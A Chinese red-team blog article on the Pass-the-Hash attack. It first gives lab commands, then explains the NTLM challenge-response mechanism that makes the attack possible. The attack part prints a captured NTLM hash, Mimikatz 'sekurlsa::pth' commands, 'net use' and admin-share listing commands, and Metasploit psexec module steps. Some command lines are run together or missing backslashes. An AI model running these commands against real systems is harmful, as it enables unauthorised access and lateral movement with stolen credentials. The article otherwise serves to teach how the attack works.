渗透攻击红队
一个专注于红队攻击的公众号
大家好,这里是 渗透攻击红队 的第 53 篇文章,本公众号会记录一些红队攻击的笔记(由浅到深),不定时更新
只有对原理了然如心,才能突破更多的限制。
只有突破了更多的限制,你才能走的更稳更远。
只有这两步都做到了,才能做到真正的自由,才可能获得真正意义上的技术进步。
----一位前辈
Pass The Hash(哈希传递)攻击与分析
Pass The Hash 攻击手法
首先我们要知道 PTH 的攻击手法,其攻击手法很简单,只需要目标的用户名、HTLM 加密的密码即可完成 PTH 攻击,注意攻击的端口是 445 端口,该端口是 SMB 服务。
-
攻击者:mary(工作组,管理员权限)
-
目标:administrator(本地管理员)
-
目标IP:192.168.3.31
首先是使用 Mimikatz 抓取到了本地管理员的 NTLM Hash:
administrator518b98ad4178a53695dc997aa02d455c
运行命令完成 PTH 攻击:
# 示例命令mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:目标机器IP /ntlm:xxxxxx"#实际命令mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:192.168.3.31 /ntlm:518b98ad4178a53695dc997aa02d455c"# 与本地管理员建立IPCnet use \192.168.3.21# 查看目标机器的C盘文件dir \192.168.3.31c$
这就是 Pass The Hash 的攻击手法,当然我们还可以使用 Metasploit 现有的利用模块 :
use exploit/windows/smb/psexecset rhost ipset SMBuser userset SMBpass NTLM Hashrun
关于 PTH 我博客中也写过攻击方式:(阅读全文查看)
http://www.saulgoodman.cn/2020/11/29/pass-the-hash/
这就是 PTH 的攻击手法,大家可能有疑问为什么能够不使用密码的情况下就能获取目标的权限?
下文就是 PTH 的原理。
Pass The Hash 漏洞原理
我们要知道 PTH 原理的话首先需要知道 Windows 网络认证:“NTLM 挑战/响应验证机制”,总共三步:
一:协商
协商就是客户端向服务端确认协议的版本是 v1 还是 v2,因为版本不同会选则不同的机制。
二:咨询
咨询就分为 4 小步:
1:客户端向服务端发送一个用户信息的请求,其中必须包含其用户名,否则不通过。
2:服务端成功接收到客户端发来的请求后,生成一个 16 位数的“随机字符”(Challenge)。使用该客户端发来的用户名对应的 NTLM Hash 本地查询后进行加密 Challenge,这时候就会生成一个叫做“Net NTLM Hash”。生成完后服务端会将 Challenge 发送回客户端。
其中:Net NTLM Hash = NTLM Hash 加密(Challenge)。
三:验证
3:当客户端收到服务端加密发来的 Challenge 后,使用将要登陆的用户名对应的 NTLM Hash 加密(Challenge)再次生成一个叫做“Response”,之后吧 Response 再次发送给服务端。
4:服务端收到客户端发来的 Response 后,会先去对比 Net NTLM Hash 对应的 Response 是否相等,如果相等的话则通过认证,成功登陆。
PS:其实到这里从“验证”开始就出现了一个问题,Windows 是不会记录明文密码的!所以我们只需要获取到目标的 NTLM Hash 值和 用户名,就能成功登陆,因为 NTLM Hash 登陆需要 Challenge ,而 Challenge 是服务端发送给我们客户端的,我们无需构造,所以就造成了一个“逻辑漏洞”的缺陷,这样我们就能够成功登陆到系统,因此就产生了哈希传递攻击。
PS:文字不长,一遍看不懂就再看一遍直到看懂为止,注意红色字体重点即可。
参考文章:
http://www.saulgoodman.cn/2020/11/29/pass-the-hash/
本文始发于微信公众号(渗透攻击红队):从原理角度来看攻击手法:Pass The Hash(哈希传递)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论